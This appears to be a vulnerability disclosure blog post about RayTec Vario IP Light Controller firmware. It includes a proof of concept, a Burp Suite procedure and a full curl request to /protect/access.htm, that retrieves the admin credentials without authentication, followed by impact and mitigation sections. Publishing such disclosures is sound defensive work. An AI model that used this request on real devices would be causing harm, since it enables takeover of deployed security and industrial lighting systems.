The RayTec IR Light Controller plays a crucial role in IoT technology. It serves as a centralized tool for managing and controlling infrared (IR) light sources. Users can remotely adjust the intensity, color, and timing of IR light, enabling applications in security systems, smart homes, and industrial processes. However, the firmware of RayTec IR Light Controllers contains vulnerabilities that pose significant risks to user privacy, safety, and system integrity. These

vulnerabilities need to be addressed promptly to ensure secure and seamless operation of IoT devices in various sectors.

A critical vulnerability has been discovered in RayTec IoT devices by Redinent Researchers, posing risks to user privacy and system integrity. Attackers can exploit this vulnerability by intercepting requests and accessing the device’s web interface using publicly exposed administrator credentials. Many globally exposed RayTec devices are affected by this vulnerability, and despite responsible disclosure, no action has been taken by RayTec or certification bodies. This disclosure aims to raise awareness and prompt manufacturers and the wider IoT community to take swift action. Given the widespread use of RayTec devices in critical sectors, it is essential to prioritize user privacy, safety, and system integrity.

 

The POC are as follows-

1.Open up the Raytec Vario IP Light Controller IP .

2.Now click on access and intercept the request using any proxy tool like burpsuite
3.Now send the request to the repeater and send the request.
4.In the response tab, the admin username and password is leaked at masterusername and masterpassword .

Now use the username and password to login into the web interface.
Another simple way to get admin username and password without authentication is –
1.Open up the terminal and run the command-
curl -i -s -k -X GET \
-H "Host: [ip]:[port]" \
-H "User-Agent: Mozilla/5.0 (X11; CrOS x86_64 15117.87.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate" \
-H "Connection: close" \
-H "Referer: http://[ip]:[port]/logon.htm" \
-H "Upgrade-Insecure-Requests: 1" \
-H "sec-ch-ua-platform: \"Chromium OS\"" \
-H "sec-ch-ua: \"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"" \
-H "sec-ch-ua-mobile: ?0" \
'http://[ip]:[port]/protect/access.htm'
In the response, the admin username and password is leaked at masterusername and masterpassword .

Now use the username and password to login into the web interface.

Impact:

Unauthorized access to the Raytec Vario IP Light Controller poses various risks, including compromising user privacy and system integrity. With leaked admin credentials, an attacker could infiltrate the network, gaining access to confidential data and potentially compromising the entire security infrastructure. Furthermore, the consequences extend beyond immediate implications. As the popularity of Raytec devices grows, the potential for widespread chaos escalates. Imagine someone gaining control over millions of lights, having the ability to manipulate settings and turn them off remotely. This significant security risk not only compromises user safety but also tarnishes Raytec’s reputation. Urgent and effective fixes are necessary to prevent potential catastrophic scenarios and protect the brand’s value.

Mitigation Strategies:

To address vulnerabilities in the Raytec Vario IP Light Controller, several suggested fixes can be implemented. Firstly, secure credential storage can be enhanced by employing robust encryption algorithms like AES to make admin credentials indecipherable to unauthorized individuals. Secondly, key management fortification involves storing encryption keys in a secure vault separate from the encrypted credentials. Lastly, ensuring authorized communication for internal API calls prevents unauthorized access and maintains system integrity. By implementing these measures, the Raytec Vario IP Light Controller can protect exposed admin credentials, making them secure and unreadable even in the face of potential breaches or unauthorized access. It’s akin to storing the admin credentials in an impenetrable vault with a combination only known to authorized individuals.
A year has passed since Redinent researchers reached out for a full disclosure, yet no response was received. Despite the lack of response, we have decided to publish this blog as a way to shed light on the situation. The lack of response from the OEM is concerning, and it highlights the importance of open and transparent communication in research. We hope that this blog will spark a dialogue and encourage researchers to respond and engage in meaningful discussions. In the spirit of full disclosure, it is imperative that all parties involved are transparent and communicative in their findings and research efforts..
Stay alert, stay protected